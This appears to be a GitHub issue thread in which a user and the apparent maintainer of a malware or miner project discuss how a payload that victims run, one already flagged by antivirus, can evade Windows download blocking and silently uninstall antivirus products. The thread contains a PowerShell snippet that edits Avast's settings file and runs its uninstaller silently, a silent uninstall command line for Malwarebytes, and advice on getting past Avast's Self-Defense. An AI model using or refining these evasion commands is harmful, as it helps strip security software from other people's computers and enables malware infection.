Serious issue

[shainodev]

Isn't the "Block" feature of windows (that requires you to go to the properties of the file and unblock) gonna block the downloaded file?

[UnamSanctam]

If you have that enabled then sure, though if that's enabled then that would be the case for all downloaded files and there isn't anything you can do about it.

[shainodev]

If you have that enabled then sure, though if that's enabled then that would be the case for all downloaded files and there isn't anything you can do about it.

what about Unblock-File feature on powershell?

[shainodev]

also would it be smart to run "c:\program files\malwarebytes' anti-malware\unins000.exe" /verysilent /suppressmsgboxes /norestart and all other antivirus uninstall files silently?

[UnamSanctam]

what about Unblock-File feature on powershell?

Sure but files downloaded through powershell shouldn't be blocked I don't think, at least from when I tested a couple years ago they weren't. The blocking would rather be for the downloader itself that the user downloads from the internet (before they have run anything).

also would it be smart to run "c:\program files\malwarebytes' anti-malware\unins000.exe" /verysilent /suppressmsgboxes /norestart and all other antivirus uninstall files silently?

If it's available then sure, many antiviruses don't allow that though.

[shainodev]

If it's available then sure, many antiviruses don't allow that though.

how could they prevent it? my main exe file (the one they run) is detected anyway. so it wouldnt matter they would have to turn it off, and then it silently uninstalls. would that be good?

[UnamSanctam]

how could they prevent it? my main exe file (the one they run) is detected anyway. so it wouldnt matter they would have to turn it off, and then it silently uninstalls. would that be good?

The silent uninstall is something the antiviruses have to either allow or create themselves (depending on what they use), so most antiviruses usually don't allow or add a way to silent uninstall.

[shainodev]

how could they prevent it? my main exe file (the one they run) is detected anyway. so it wouldnt matter they would have to turn it off, and then it silently uninstalls. would that be good?

The silent uninstall is something the antiviruses have to either allow or create themselves (depending on what they use), so most antiviruses usually don't allow or add a way to silent uninstall.

most major antiviruses have a silent uninstall (avast, malwarebytes). and how do they tell a difference if it is the IT guy, or if it is the person using the pc?

[UnamSanctam]

most major antiviruses have a silent uninstall (ESET, bitdefender, avast, malwarebytes). and how do they tell a difference if it is the IT guy, or if it is the person using the pc?

They can't tell the difference but for Avast you have to manually go into the Avast program and disable Self-Defense and then you have to go into a file and edit it to enable silent mining and then finally you can run the silent uninstall command.

[shainodev]

They can't tell the difference but for Avast you have to manually go into the Avast program and disable Self-Defense and then you have to go into a file and edit it to enable silent mining and then finally you can run the silent uninstall command.

$stats_file = "C:\Program Files\Avast Software\Avast\setup\Stats.ini" (Get-Content $statsfile) | ForEach-Object { $ -replace "[Common]", "[Common]`nSilentUninstallEnabled=1" } | Set-Content $stats_file

Start-Process -filepath "C:\Program Files\Avast Software\Avast\setup\instup.exe" -argumentlist "/instop:uninstall /silent /wait"

this wont work?

[UnamSanctam]

$stats_file = "C:\Program Files\Avast Software\Avast\setup\Stats.ini" (Get-Content $statsfile) | ForEach-Object { $ -replace "[Common]", "[Common]`nSilentUninstallEnabled=1" } | Set-Content $stats_file Start-Process -filepath "C:\Program Files\Avast Software\Avast\setup\instup.exe" -argumentlist "/instop:uninstall /silent /wait" this wont work?

You also need to disable Self-Defense manually in the Avast programs control panel first, at least that was the case back when I was experimenting with silently uninstalling antiviruses.

[shainodev]

oh. did you test malwarebytes aswell?

[UnamSanctam]

Yes I believe it's possible with them, since I think Malwarebytes is still using Inno Setup for the setups.

[shainodev]

So is it smart to have a File exists check (for malwarebytes) and then make it silently uninstall? or would it just raise too many detections